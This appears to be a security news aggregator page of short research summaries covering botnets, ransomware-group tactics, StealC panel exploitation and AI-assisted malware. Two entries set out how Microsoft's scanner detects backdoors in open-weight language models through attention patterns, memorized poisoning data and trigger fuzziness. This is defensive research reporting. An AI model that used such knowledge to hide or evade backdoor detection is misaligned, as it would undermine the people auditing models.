< ciso
brief />
Tag Banner

All news with #research tag

199 articles · page 3 of 10

New Linux botnet SSHStalker uses IRC for C2 comms campaign

🛡️ A newly documented Linux botnet named SSHStalker uses the legacy IRC protocol for command-and-control while relying on noisy SSH scanning and brute forcing for initial access. Researchers at Flare say it deploys a Go binary masquerading as nmap, compiles C-based IRC bots on hosts, and persists via cron jobs that run every 60 seconds. The kit favors scale and reliability over stealth, reuses a back-catalog of decade-plus-old CVEs for privilege escalation, and includes AWS key harvesting, cryptomining, and dormant DDoS code.
read more →

Muddled Libra Rogue VM Playbook and Operational Tactics

🔐 Unit 42 recovered a rogue VM created by Muddled Libra (aka Scattered Spider, UNC3944) during a September 2025 incident, revealing an operational playbook of reconnaissance, credential theft, lateral movement and data access. The actors abused legitimate tools and stolen certificates, persisted via an SSH tunnel (Chisel), and copied NTDS.dit and SYSTEM hives. Unit 42 recommends strengthening identity controls and adopting Advanced WildFire and Cortex defenses.
read more →

LLMs Accelerate Zero-Day Discovery: Opus 4.6 Advances

🔎 Claude Opus 4.6 markedly improves automated vulnerability discovery, finding high-severity bugs faster and without task-specific tooling. Unlike traditional fuzzers, which depend on massive random inputs, Opus 4.6 reads and reasons about code like a human researcher—spotting patterns, past fixes, and precise inputs that trigger failures. Early tests show it uncovered long-standing zero-days in projects previously subject to extensive fuzzing.
read more →

Smartphones Now Central to Nearly Every Police Probe

🔍 A Cellebrite 2026 Industry Trends Report based on 1,200 law enforcement respondents across 63 countries finds digital evidence — particularly from smartphones — has become central to almost all investigations. Some 95% of practitioners say digital evidence is key to solving cases and 97% point to smartphones as a top source. Agencies report increasing complexity, locked devices in over half of cases, and growing resource reallocations to handle digital work, while many see AI as useful but constrained by policy.
read more →

Microsoft Builds Scanner to Detect Backdoors in LLMs

🔍 Microsoft has developed a lightweight scanner to detect backdoors in open-weight large language models (LLMs) by evaluating three observable signals tied to internal model behavior. The tool extracts memorized content, isolates suspect substrings, and scores candidates with loss functions that formalize attention and output anomalies. The approach requires no additional training and runs across common GPT‑style models, but it needs access to model files and is best suited for trigger-based, deterministic backdoors.
read more →

Detecting Backdoored Language Models at Scale — Practical Scanner

🔍 Microsoft researchers released new findings and a practical scanner for detecting backdoors in open-weight language models. The study identifies three signatures — a distinctive “double triangle” attention pattern, leakage of poisoning training data through memorization, and trigger “fuzziness” — and uses them to reconstruct likely triggers without retraining. The scanner requires only forward passes, works on GPT-like models, and was validated across 270M–14B models and common fine-tuning regimes. The team notes limits: it needs model file access, favors deterministic backdoors, and should be used as part of layered defenses.
read more →

Massive Citrix NetScaler Scans Use Residential Proxies

🔎 GreyNoise observed a coordinated reconnaissance campaign from Jan 28–Feb 2 that used tens of thousands of residential proxies to discover Citrix NetScaler/Citrix Gateway login panels and enumerate product versions. Over 63,000 distinct IPs launched 111,834 sessions, with roughly 64% appearing as residential ISP addresses and the remainder linked to a single Azure IP. The scans concentrated on /logon/LogonPoint/index.html and the EPA artifact /epa/scripts/win/nsepa_setup.exe, indicating pre‑exploitation mapping and version‑specific probing. GreyNoise recommends monitoring anomalous UA strings, flagging EPA artifact access, restricting internet‑facing Gateways, and disabling version disclosure.
read more →

Nearly 400 Malicious OpenClaw Crypto Trading Skills

⚠️ Security researcher Paul McCarty (aka 6mile) has identified 386 malicious OpenClaw "skills" on the ClawHub repository that impersonate crypto trading tools. The add-ons use social engineering to trick users into executing commands that deploy infostealers on macOS and Windows, harvesting exchange API keys, wallet private keys, SSH credentials and browser passwords. The discovered skills share a common C2 IP (91.92.242.30) and many remain available, with the most active uploader accounting for nearly 7,000 downloads.
read more →

AI Agent Identity Management: New Control Plane for CISOs

🔐 AI agents—custom GPTs, copilots, coding agents and other autonomous tooling—are proliferating in production while remaining largely outside traditional IAM, PAM, and IGA controls. The piece argues for treating agents as a distinct identity class and applying continuous identity lifecycle management to ensure visibility, ownership, dynamic least privilege, and auditability. Rather than slowing adoption, this approach positions identity as the control plane for balancing innovation and security.
read more →

Over 80% of Ethical Hackers Now Use AI in Workflows

🤖 Bugcrowd's survey of 2,000 security researchers found 82% now incorporate AI into their workflows, up from 64% in 2023. Respondents highlighted automation of repetitive tasks, analysis of messy or large codebases, and AI as a research assistant as primary use cases. Organizations gain faster, more comprehensive and higher-quality findings without necessarily increasing budgets. The report also notes stronger outcomes from team collaboration and outlines key community demographics.
read more →

Airlock Digital Forrester TEI Finds 224% ROI and $3.8M NPV

🔒 The Forrester Consulting Total Economic Impact (TEI) study commissioned by Airlock Digital reports a 224% ROI and a $3.8 million net present value over three years for organizations that adopt Airlock’s allowlisting approach. The analysis cites a >25% reduction in overall breach risk and notes zero breaches among interviewed customers after deployment. It also highlights operational efficiency gains — policy management requiring roughly 2.5 hours per week — and reduced administrative overhead thanks to Airlock’s modern, operationally friendly implementation of allowlisting.
read more →

VoidLink cloud malware shows clear signs of AI generation

🧠 Check Point Research reports that the VoidLink Linux cloud malware framework displays clear evidence of being developed predominantly with AI assistance. The actor used an AI-centric IDE, TRAE, and its assistant TRAE SOLO to produce specification documents, sprint plans, and large portions of source code, which reached a working state within days. Exposed development artifacts — including TRAE helper files and an open directory of source and docs — allowed researchers to match generated specs to the recovered code and reproduce the development workflow, leading Check Point to conclude this is a notable example of AI-driven malware development.
read more →

Azure Private Endpoint DNS Risks Can Cause Service DoS

🔒 Unit 42 researchers discovered an Azure Private Endpoint DNS behavior that can unintentionally or deliberately produce denial-of-service conditions for Azure services. In several scenarios — accidental internal, accidental vendor, and malicious actor — linking a Private DNS zone to a virtual network can force name resolution to the private zone and fail when no A record exists, breaking connectivity to otherwise public endpoints. Microsoft documents a partial mitigation (fallback to internet); alternatives include manually adding DNS records and performing comprehensive discovery with Resource Graph.
read more →

The AI Fix #84: Hungry ghost, data poisoning, Grok

🤖 In episode 84 of The AI Fix, hosts Graham Cluley and Mark Stockley survey a series of recent AI developments that raise practical and philosophical questions. They discuss reports that Grok will be integrated into Pentagon networks, a campaign by insiders to poison training data, and research showing small amounts of tainted data can sway model behavior. The episode also covers Google removing AI health overviews after risky outputs, findings that asking a model the same question twice can improve answers, and surprising advances in automated theorem solving.
read more →

Researchers Exploit XSS in StealC Panel to Gather Evidence

🔍 CyberArk researchers disclosed they exploited a cross-site scripting (XSS) vulnerability in the web panel of the StealC infostealer to retrieve active session cookies and operational metadata. Researcher Ari Novick used the weakness to link a StealC customer, dubbed YouTubeTA, to the theft of roughly 390,000 passwords and over 30 million cookies from victims seeking cracked Adobe software on YouTube. Analysis of hardware fingerprints, language settings, time zones and IP addresses indicated the operator used an Apple Pro with an M3 chip, supported English and Russian, operated in an Eastern European time zone and connected via Ukrainian ISP TRK Cable TV, underscoring how weaknesses in criminal tooling can expose both victims and customers to supply-chain risk.
read more →

XSS Flaw in StealC Panel Lets Researchers Monitor Operators

🔍 Cybersecurity researchers disclosed an XSS vulnerability in the web-based control panel used by operators of the StealC information stealer. By exploiting it they collected system fingerprints, monitored active sessions, and stole session cookies from the infrastructure itself, according to CyberArk researcher Ari Novick. The panel's leaked source code and the stealer's distribution through the YouTube Ghost Network and other lures amplified the operational insights researchers gained. Full technical details were withheld to avoid enabling copycats.
read more →

Researchers Hijack StealC Panels via XSS, Expose Operators

🔒 A cross-site scripting (XSS) flaw in the web control panel for the StealC info‑stealer allowed researchers to observe active operator sessions, capture session cookies and harvest browser and hardware fingerprints. CyberArk exploited the issue to identify an operator’s location and device details after a panel user failed to route traffic through a VPN. The company withheld technical disclosure to avoid a quick fix and said the finding may disrupt StealC’s MaaS ecosystem.
read more →

AI Image Leaks Fuel New Wave of Sextortion Risks Worldwide

⚠️Researchers in 2025 discovered multiple unsecured databases of AI-generated images and videos, many depicting sexualized or fabricated nudes created from everyday photos. Analysis pointed to third-party generative tools such as MagicEdit and DreamPal, which offered explicit editing, face‑swap and clothing‑change features and, in some cases, disabled filters for erotic content. The exposure highlights how generative AI lowers the barrier to producing convincing fake intimate images and broadens the pool of potential sextortion victims. The post urges tightening social media privacy, using tools like Privacy Checker, and monitoring children with Kaspersky Safe Kids.
read more →

Privacy Teams Shrink as Stress and Funding Fall Short

📉 ISACA's State of Privacy 2026 report reveals privacy teams are shrinking and underfunded despite mounting regulatory and technological pressures. The median privacy staff size fell to five from eight year-over-year, and technical privacy roles are notably understaffed while demand for those skills rises. Respondents report increased stress—35% say their role is 'significantly more stressful' and 30% 'slightly more stressful'—attributed to rapid tech evolution, compliance complexity and resource shortages. To close skill gaps, organizations are training interested non-privacy staff and increasing reliance on contractors, consultants and planned AI tools for privacy tasks.
read more →

Palo Alto Networks Automates DORs with Agentic AI Design

🤖 Palo Alto Networks automated creation of its internal Document of Record (DOR) using an agent built with Google's open-source Agent Development Kit (ADK) and hosted on Vertex AI Agent Engine. The agent leverages Vertex AI RAG Engine, Vertex AI Discovery Search, Gemini models, and Cloud Storage to retrieve and synthesize grounded answers to a standardized set of 140+ questions. A FastAPI webserver on GKE orchestrates parallel processing, manages state, and publishes completed DORs back to Salesforce via Cloud Pub/Sub, reducing manual effort and improving consistency.
read more →